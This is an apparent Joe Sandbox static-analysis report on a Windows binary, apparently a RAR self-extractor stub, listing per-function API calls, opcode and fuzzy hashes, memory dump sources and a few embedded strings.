                                                • Opcode ID: 6a8dd59aab9d8091829e9034ef43dc3ee46f068c374b4feccfbaea3f9217a904
                                                • Instruction ID: 460b9a86e3c08b8dba0004dbbcbc759f87cb76d2d489b95fd2d22d13fd8a7d62
                                                • Opcode Fuzzy Hash: 6a8dd59aab9d8091829e9034ef43dc3ee46f068c374b4feccfbaea3f9217a904
                                                • Instruction Fuzzy Hash: 4F510435B40312A6DB309A2488627F672E5EF64741FE800D9FD91BB2C0EB75DDD083A0
                                                APIs
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000001), ref: 00B20720
                                                • SendMessageW.USER32(?,00000080,00000001,00070459), ref: 00B20747
                                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050E80), ref: 00B20760
                                                • GetDlgItem.USER32(?,00000065), ref: 00B2077C
                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B20790
                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B207A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: MessageSend$Item$DialogTextWindow
                                                • String ID: LICENSEDLG
                                                • API String ID: 3077722735-2177901306
                                                • Opcode ID: 7a8791fb566692b46dce4933a3c3a30a573a7b63b51a2a0204aced5360fb131a
                                                • Instruction ID: c87180379f1903f2bf0cadcf9010c90762855140b9d7b2d8dcf24782add25a0a
                                                • Opcode Fuzzy Hash: 7a8791fb566692b46dce4933a3c3a30a573a7b63b51a2a0204aced5360fb131a
                                                • Instruction Fuzzy Hash: 59219C31399624BBD6116F25BD4DF6B3AEDEB46786F0100C4F605A70A2CFA1AE018B71
                                                APIs
                                                • __aulldiv.LIBCMT ref: 00B1783D
                                                  • Part of subcall function 00B1067E: GetVersionExW.KERNEL32(?), ref: 00B106AF
                                                • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B17860
                                                • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B17872
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B17883
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B17893
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B178A3
                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B178DE
                                                • __aullrem.LIBCMT ref: 00B17984
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                • String ID:
                                                • API String ID: 1247370737-0
                                                • Opcode ID: 7b7f6615a1117f65052aaf8fd0d0c6cca3e782f7938086fec3e5753507de55d4
                                                • Instruction ID: 3d22f783fe89aae6bd91b4581600ace9a2e4a48ca07d236a3d1287722d2260ac
                                                • Opcode Fuzzy Hash: 7b7f6615a1117f65052aaf8fd0d0c6cca3e782f7938086fec3e5753507de55d4
                                                • Instruction Fuzzy Hash: 655138B1548305AFD710DF65C8849ABBBF9FB88714F50892EF59AD3210EB34E948CB52
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B10E50
                                                • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00B10E85
                                                • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00B10EC4
                                                • _wcslen.LIBCMT ref: 00B10ED4
                                                • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00B10F51
                                                • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00B10F93
                                                • _wcslen.LIBCMT ref: 00B10FA3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FullNamePath$_wcslen$H_prolog3_
                                                • String ID:
                                                • API String ID: 840513527-0
                                                • Opcode ID: d2a9542b71ddc186423ca99079ef72f8698dc5649db9f36baa04a960344a3cda
                                                • Instruction ID: 66bd29216669f99bc67c3ae3fe681c00b51eef7f0b5babbbac7dfb09045ca465
                                                • Opcode Fuzzy Hash: d2a9542b71ddc186423ca99079ef72f8698dc5649db9f36baa04a960344a3cda
                                                • Instruction Fuzzy Hash: 00617C71D10208ABCB14EFA9D985EEEBBF9EF89710F54459AF410E7290DB749980CB60
                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B369AE,?,00000000,?,00000000,00000000), ref: 00B3627B
                                                • __fassign.LIBCMT ref: 00B362F6
                                                • __fassign.LIBCMT ref: 00B36311
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B36337
                                                • WriteFile.KERNEL32(?,?,00000000,00B369AE,00000000,?,?,?,?,?,?,?,?,?,00B369AE,?), ref: 00B36356
                                                • WriteFile.KERNEL32(?,?,00000001,00B369AE,00000000,?,?,?,?,?,?,?,?,?,00B369AE,?), ref: 00B3638F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: bcf1c8deeaef1496b4052245e13b4033a8b14a1f87378dbe17b97a7739538b39
                                                • Instruction ID: fad5308aa15a7e32a0bec89df1f40d6d90eaf12a119cbeb548ec4fd16035fa66
                                                • Opcode Fuzzy Hash: bcf1c8deeaef1496b4052245e13b4033a8b14a1f87378dbe17b97a7739538b39
                                                • Instruction Fuzzy Hash: 4951A571E00249AFDB10CFA8DC85AEEBBF8EF09310F24819AE556E7291D7709D44CB64
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 00B293F7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00B293FF
                                                • _ValidateLocalCookies.LIBCMT ref: 00B29488
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00B294B3
                                                • _ValidateLocalCookies.LIBCMT ref: 00B29508
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: ba2826427a6fe41d5e363f6108c7045e106b70d73e3629c316000245ea0ea855
                                                • Instruction ID: 74142f141c4bc94b07368bb44841a73c6c12a7b487af7b61c18986f793782391
                                                • Opcode Fuzzy Hash: ba2826427a6fe41d5e363f6108c7045e106b70d73e3629c316000245ea0ea855
                                                • Instruction Fuzzy Hash: D8416334A002289BCF20EF68E885A9E7BF5FF45314F1485D5E82D9B392D731AD06CB91
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1E26C
                                                • ShowWindow.USER32(?,00000000,00000038), ref: 00B1E294
                                                • GetWindowRect.USER32(?,?), ref: 00B1E2D8
                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B1E373
                                                • ShowWindow.USER32(00000000,00000005), ref: 00B1E394
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Window$Show$H_prolog3_Rect
                                                • String ID: RarHtmlClassName
                                                • API String ID: 950582801-1658105358
                                                • Opcode ID: 85b0d889337586f6d7598e1800188be9fd97a447837bda1a44a0b3993f45a900
                                                • Instruction ID: 9ff1e12f2295805a98be86374fa42ffdb0c878ff285173412e653a67ca8d21e8
                                                • Opcode Fuzzy Hash: 85b0d889337586f6d7598e1800188be9fd97a447837bda1a44a0b3993f45a900
                                                • Instruction Fuzzy Hash: 4F412571A01204ABDF119FA4EC89BEE7BF9EF48301F544199FD24AB161DB70D981CB64
                                                APIs
                                                  • Part of subcall function 00B33518: _free.LIBCMT ref: 00B33541
                                                • _free.LIBCMT ref: 00B335A2
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B335AD
                                                • _free.LIBCMT ref: 00B335B8
                                                • _free.LIBCMT ref: 00B3360C
                                                • _free.LIBCMT ref: 00B33617
                                                • _free.LIBCMT ref: 00B33622
                                                • _free.LIBCMT ref: 00B3362D
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                • Instruction ID: 29275d33563954d4cb89c9e80fef9ca9e095bad6077ecc4a53ade2974619944c
                                                • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                • Instruction Fuzzy Hash: 4E114271940B04BBDA30BBB0CC17FCBB7DCAF14B01F514C55B299B6552DA79B6098790
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00000000,?,00B24DDA,00B24D3D,00B24FDE,?,00000000,?,?,?,?,?,?,00B253A4,00B472EC), ref: 00B24D76
                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B24D8C
                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B24DA1
                                                Strings
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                • API String ID: 667068680-1718035505
                                                • Opcode ID: 80203c7aa91d72618451f473721f23c25db40d86e876cfcc9d39c62b317acd58
                                                • Instruction ID: fd307d77d9b5948ed070912cbce56d485edf4999357083d6910f7d33632fccc7
                                                • Opcode Fuzzy Hash: 80203c7aa91d72618451f473721f23c25db40d86e876cfcc9d39c62b317acd58
                                                • Instruction Fuzzy Hash: 03F0C833611A32D70B315EB47C9577A36DCEA0579632006F9D629D7AE0EB60CC114790
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B2C5A2,00B2C5A2,?,?,?,00B3185A,00000001,00000001,C5E85006), ref: 00B31663
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B3185A,00000001,00000001,C5E85006,?,?,?), ref: 00B316E9
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B317E3
                                                • __freea.LIBCMT ref: 00B317F0
                                                  • Part of subcall function 00B3040E: RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                • __freea.LIBCMT ref: 00B317F9
                                                • __freea.LIBCMT ref: 00B3181E
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: e8a8dc1064ebcda645eb571c154260a6ec87ca58853c8890aee08e0541ab9c98
                                                • Instruction ID: bcd02e0e20f69082ceafecb3bdeb4ac79ed0a0805f22a173b9a20a52f728b605
                                                • Opcode Fuzzy Hash: e8a8dc1064ebcda645eb571c154260a6ec87ca58853c8890aee08e0541ab9c98
                                                • Instruction Fuzzy Hash: 4751A3B2600216ABDB259F68CC81EBB77EEEB44750F394AA8FC04E7150EB34DC50D660
                                                APIs
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00B17B06
                                                  • Part of subcall function 00B1067E: GetVersionExW.KERNEL32(?), ref: 00B106AF
                                                • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B17B2A
                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00B17B44
                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00B17B57
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B17B67
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B17B77
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion
                                                • String ID:
                                                • API String ID: 2092733347-0
                                                • Opcode ID: 7d422435aeb159d3a964b1c05a04413bcebcd6e4ec8c793de719e537e349c47b
                                                • Instruction ID: ae9c6e80ffe43fa941e3569973a59d4076643b1f7dbb486d5b8e7e17c977e56d
                                                • Opcode Fuzzy Hash: 7d422435aeb159d3a964b1c05a04413bcebcd6e4ec8c793de719e537e349c47b
                                                • Instruction Fuzzy Hash: 644125761083159BC704DFA8C88599BBBF8FF98704F04495EF989D7220EB30D948CBA6
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?,5EA84158,?,?,?,?,00B3AA27,000000FF), ref: 00B1F38A
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00B3AA27,000000FF), ref: 00B1F399
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3A7
                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3B5
                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3D0
                                                • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3FA
                                                Similarity
                                                • API ID: Time$System$File$Format$DateLocalSpecific
                                                • String ID:
                                                • API String ID: 909090443-0
                                                • Opcode ID: 540f5d31902a588ca4416c9cd68f180449444ace02dc217b57b48114b39aec51
                                                • Instruction ID: 2e8a890128e6b1e6ac9ed885142a73baaa4e6a898d29faddeb6a402c22e1aab5
                                                • Opcode Fuzzy Hash: 540f5d31902a588ca4416c9cd68f180449444ace02dc217b57b48114b39aec51
                                                • Instruction Fuzzy Hash: F9311CB2500188AFDB24DFA4DD45EEF7BACFB09700F00456AF906E7181EB74AA04CB60
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00B29771,00B296CC,00B26A64), ref: 00B29788
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B29796
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B297AF
                                                • SetLastError.KERNEL32(00000000,00B29771,00B296CC,00B26A64), ref: 00B29801
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 1f63c4bb42240778c27faba5209928c93b48c595b7893fa0c35b310384f2715d
                                                • Instruction ID: e77ae8ac7f68fc35998b44a8c18a857dc44f1645becae4be21719bd06bc377e2
                                                • Opcode Fuzzy Hash: 1f63c4bb42240778c27faba5209928c93b48c595b7893fa0c35b310384f2715d
                                                • Instruction Fuzzy Hash: D901DF36229232EEA6252FB57CE956B6BD8FB02379B3003B9F52C961F4EF114C40D241
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00B2B581,?,00B4E088,?,00B2AE80,?,00B4E088,?,00000007), ref: 00B30009
                                                • _free.LIBCMT ref: 00B3003C
                                                • _free.LIBCMT ref: 00B30064
                                                • SetLastError.KERNEL32(00000000,00B4E088,?,00000007), ref: 00B30071
                                                • SetLastError.KERNEL32(00000000,00B4E088,?,00000007), ref: 00B3007D
                                                • _abort.LIBCMT ref: 00B30083
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 66d95aeb9d2ed324fc04b1383b06e4c7a774280eadb05c4dff5b10ad169a8eb3
                                                • Instruction ID: e234694c6a7d9e5b3b45b370f07391dc29e3b1c261e36767a2ff36516fadd2e3
                                                • Opcode Fuzzy Hash: 66d95aeb9d2ed324fc04b1383b06e4c7a774280eadb05c4dff5b10ad169a8eb3
                                                • Instruction Fuzzy Hash: 3CF0A43A154615A7C22A33786C6AF2F3AE9DFC1B61F3501A4F518A3192EF348C468324
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B23FDB
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B23FF5
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B24006
                                                • TranslateMessage.USER32(?), ref: 00B24010
                                                • DispatchMessageW.USER32(?), ref: 00B2401A
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B24025
                                                Similarity
                                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 2148572870-0
                                                • Opcode ID: 7e859dcae99c1cd946eca073c98c87c44f59234d2d485ea0a585760b10dd681c
                                                • Instruction ID: 5170f903a00f6e22ce8d899a811989668d5d1c9efc5941699c1797e7bd45040c
                                                • Opcode Fuzzy Hash: 7e859dcae99c1cd946eca073c98c87c44f59234d2d485ea0a585760b10dd681c
                                                • Instruction Fuzzy Hash: 18F04F72A05229BBCB205BE1FC4CECF7FADEF45792B044051FA0AE2094EA349541CBE0
                                                APIs
                                                • GetDlgItem.USER32(?,00000066), ref: 00B226A9
                                                • SendMessageW.USER32(00000000,00000143,00000000,00B55380), ref: 00B226D6
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B22702
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00B225F4
                                                • ProgramFilesDir, xrefs: 00B225E0
                                                Similarity
                                                • API ID: MessageSend$Item
                                                • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                • API String ID: 3888421826-2634093826
                                                • Opcode ID: c2bbe21ed6416f0dc707af571e4732941e0049b5b6929236bede412428605112
                                                • Instruction ID: 9167ca8e8a0152867f33248b7818156f58f77fcb148a27a5da7239dd22b8521c
                                                • Opcode Fuzzy Hash: c2bbe21ed6416f0dc707af571e4732941e0049b5b6929236bede412428605112
                                                • Instruction Fuzzy Hash: 58815031900228AEDF24EBE4D891BEDBBF8AF18310F5454D9E509B7191DB716B89CB60
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _wcslen$H_prolog3
                                                • String ID: &nbsp;$<br>
                                                • API String ID: 1035939448-26742755
                                                • Opcode ID: 0d484fa000ed3422ecc90abc41d197b8fb976b32ef96a3af01e4487a8cca21c8
                                                • Instruction ID: 387e340f08a28e6608570a7ede222f0b676a095cac040fc1ffdb979f4ab76b18
                                                • Opcode Fuzzy Hash: 0d484fa000ed3422ecc90abc41d197b8fb976b32ef96a3af01e4487a8cca21c8
                                                • Instruction Fuzzy Hash: 1A416D31B002109BCB249F54E981B7D77B2FB95304FB084ADE4068B281EBB099D2CBD1
                                                APIs
                                                • LoadBitmapW.USER32(00000065), ref: 00B207F5
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00B2081A
                                                • DeleteObject.GDI32(00000000), ref: 00B2084C
                                                • DeleteObject.GDI32(00000000), ref: 00B2086F
                                                  • Part of subcall function 00B1EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B20845,00000066), ref: 00B1EBE6
                                                  • Part of subcall function 00B1EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EBFD
                                                  • Part of subcall function 00B1EBD3: LoadResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC14
                                                  • Part of subcall function 00B1EBD3: LockResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC23
                                                  • Part of subcall function 00B1EBD3: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00B20845,00000066), ref: 00B1EC3E
                                                  • Part of subcall function 00B1EBD3: GlobalLock.KERNEL32(00000000), ref: 00B1EC4F
                                                  • Part of subcall function 00B1EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B1EC73
                                                  • Part of subcall function 00B1EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B1ECB8
                                                  • Part of subcall function 00B1EBD3: GlobalUnlock.KERNEL32(00000000), ref: 00B1ECD7
                                                  • Part of subcall function 00B1EBD3: GlobalFree.KERNEL32(00000000), ref: 00B1ECDE
                                                Strings
                                                Similarity
                                                • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                • String ID: ]
                                                • API String ID: 1797374341-3352871620
                                                • Opcode ID: 1ab87d23ad5a4fc7d232367363691699ffc712091202efcabafc575492429456
                                                • Instruction ID: deb6c8ccc0d3b0c85be4498678761123387456e2b0a1815acbb2e2259a85cbb3
                                                • Opcode Fuzzy Hash: 1ab87d23ad5a4fc7d232367363691699ffc712091202efcabafc575492429456
                                                • Instruction Fuzzy Hash: 9E01C435950215A7D7117764AC09BBB7AF9EF80B56F0900A4FD14AB2D2EF71CC0586E1
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B2ECE0,00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002), ref: 00B2ED4F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B2ED62
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00B2ECE0,00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002), ref: 00B2ED85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9809f2d6418f460d842ff6e831f38c66f947209fe0926c8de9e67c9f64ff2881
                                                • Instruction ID: 90ffa057b3cff9bf68cc5870cff5369212a82aee459c1cb80a4de3820add87ab
                                                • Opcode Fuzzy Hash: 9809f2d6418f460d842ff6e831f38c66f947209fe0926c8de9e67c9f64ff2881
                                                • Instruction Fuzzy Hash: 39F03135A50218FBDB159FA5DC59BAEBFF5EB04755F1001A8A809A2160CF359D41CB50
                                                APIs
                                                  • Part of subcall function 00B16C5E: __EH_prolog3_GS.LIBCMT ref: 00B16C65
                                                  • Part of subcall function 00B16C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00B16C9A
                                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B150B3
                                                • GetProcAddress.KERNEL32(00B551F8,CryptUnprotectMemory), ref: 00B150C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AddressProc$DirectoryH_prolog3_System
                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                • API String ID: 270589589-1753850145
                                                • Opcode ID: 26aff16c3e5394ad2a895b2befe23cd4a09612b2addaa994b78c87ed6486ce0c
                                                • Instruction ID: 23d0472ace7418036d27818e5d570b3e82b5f2eb86ecce7f842ed335262adf38
                                                • Opcode Fuzzy Hash: 26aff16c3e5394ad2a895b2befe23cd4a09612b2addaa994b78c87ed6486ce0c
                                                • Instruction Fuzzy Hash: 72E04F70910751DEC7305BF8DC087867ED49F09704F60C8AEB4D9E3560DAB4E4808B90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
